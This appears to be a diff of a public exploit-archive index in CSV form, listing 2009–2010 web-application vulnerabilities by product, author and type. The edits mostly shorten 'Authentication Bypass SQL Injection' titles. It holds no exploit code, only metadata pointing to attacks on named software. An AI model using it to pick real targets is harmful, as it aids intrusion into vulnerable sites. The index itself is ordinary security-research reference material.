+9281,platforms/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,php,webapps,0
 9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
-9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
+9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,php,webapps,0
 9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0
 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0
 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0
@@ -21419,26 +21422,26 @@ id,file,description,date,author,platform,type,port
 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0
 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0
 9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0
-9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0
+9328,platforms/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps,0
 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0
-9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0
+9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps,0
 9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0
 9334,platforms/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,php,webapps,0
-9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
-9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
+9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
+9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0
 9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
-9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0
+9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - Authentication Bypass",2009-08-03,snakespc,php,webapps,0
 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0
 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0
 9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
-9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
+9348,platforms/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",php,webapps,0
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
-9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
+9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,php,webapps,0
 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
 9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
@@ -21453,18 +21456,18 @@ id,file,description,date,author,platform,type,port
 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
 9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0
 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0
-9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
+9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps,0
 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0
 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0
 9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0
-9395,platforms/php/webapps/9395.txt,"PHPCityPortal - (Authentication Bypass) SQL Injection",2009-08-07,CoBRa_21,php,webapps,0
+9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0
 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0
 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0
 9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0
-9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0
+9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,php,webapps,0
 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0
-9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0
+9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,php,webapps,0
 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0
 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,php,webapps,0
 9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0
@@ -21512,7 +21515,7 @@ id,file,description,date,author,platform,type,port
 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps,0
 9491,platforms/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0
 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0
-9494,platforms/php/webapps/9494.txt,"humanCMS - (Authentication Bypass) SQL Injection",2009-08-24,next,php,webapps,0
+9494,platforms/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps,0
 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Parameter Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0
 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0
 9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0
@@ -21589,12 +21592,12 @@ id,file,description,date,author,platform,type,port
 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0
 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
 9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0
-9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection",2009-09-15,snakespc,php,webapps,0
+9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,php,webapps,0
 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0
 9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0
 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0
 9693,platforms/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0
-9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Authentication Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0
+9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,php,webapps,0
 9697,platforms/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
 9698,platforms/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
 9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps,0
@@ -21605,7 +21608,7 @@ id,file,description,date,author,platform,type,port
 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0
 9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0
-9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
+9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps,0
 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
 9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0
 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0
@@ -21755,7 +21758,7 @@ id,file,description,date,author,platform,type,port
 10218,platforms/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
 10219,platforms/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
 10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
-10222,platforms/php/webapps/10222.txt,"W3infotech - (Authentication Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0
+10222,platforms/php/webapps/10222.txt,"W3infotech - Authentication Bypass",2009-11-24,ViRuS_HiMa,php,webapps,0
 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0
 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000
 10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0
@@ -21824,13 +21827,13 @@ id,file,description,date,author,platform,type,port
 10356,platforms/php/webapps/10356.txt,"Joomla! Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0
 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
-10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Authentication Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0
+10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",php,webapps,0
 10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0
 10366,platforms/php/webapps/10366.txt,"Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
 10367,platforms/php/webapps/10367.txt,"Joomla! Component com_jphoto - 'id' SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,asp,webapps,0
 10369,platforms/php/webapps/10369.txt,"Joomla! Component Mamboleto 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps,0
-10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)",2009-12-10,mr_me,php,webapps,0
+10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Authentication Bypass",2009-12-10,mr_me,php,webapps,0
 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0
 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80
 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0
@@ -21895,9 +21898,9 @@ id,file,description,date,author,platform,type,port
 10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,php,webapps,0
 10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,php,webapps,0
 10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
-10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Authentication Bypass) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0
+10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
 10467,platforms/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0
-10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0
+10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 - Authentication Bypass",2009-12-16,Red-D3v1L,asp,webapps,0
 10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
 10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
@@ -21910,17 +21913,17 @@ id,file,description,date,author,platform,type,port
 10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,ViRuSMaN,asp,webapps,0
 10485,platforms/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0
 10488,platforms/php/webapps/10488.txt,"WordPress Plugin WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0
-10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
+10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps,0
-10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
+10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0
 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
-10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
+10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
 10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
-10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
+10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
 10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
@@ -21962,7 +21965,7 @@ id,file,description,date,author,platform,type,port
 10562,platforms/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0
 10564,platforms/php/webapps/10564.txt,"Saurus CMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0
 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
-10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0
+10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - Authentication Bypass",2009-12-20,PaL-D3v1L,php,webapps,0
 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",php,webapps,0
 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0
 10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0
@@ -22147,8 +22150,8 @@ id,file,description,date,author,platform,type,port
 10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0
 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
 10830,platforms/php/webapps/10830.txt,"Azadi Network - (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
-10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
-10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
+10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0
+10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0
 10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
 10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
@@ -22163,7 +22166,7 @@ id,file,description,date,author,platform,type,port
 10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0
 10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0
 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
-10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
+10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",php,webapps,0
 10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
 10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
 10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
@@ -22179,10 +22182,10 @@ id,file,description,date,author,platform,type,port
 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0
 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0
 10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0
-10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass (SQL Injection)",2010-01-01,R3d-D3V!L,php,webapps,0
+10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass",2010-01-01,R3d-D3V!L,php,webapps,0
 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0
 10905,platforms/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0
-10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass (SQL Injection)",2010-01-02,R3d-D3V!L,php,webapps,0
+10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,php,webapps,0
 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0
 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0
 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0
@@ -22373,7 +22376,7 @@ id,file,description,date,author,platform,type,port
 11319,platforms/php/webapps/11319.txt,"MYRE Classified - (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0
 11321,platforms/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps,0
 11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)",2010-02-03,"Milos Zivanovic",php,webapps,0
-11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - (Authentication Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0
+11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0
 11324,platforms/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0
 11325,platforms/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0
 11326,platforms/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0
@@ -22387,16 +22390,16 @@ id,file,description,date,author,platform,type,port
 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0
 11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,cp77fk4r,php,webapps,0
 11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,HackXBack,php,webapps,0
-11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
-11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
+11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
+11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0
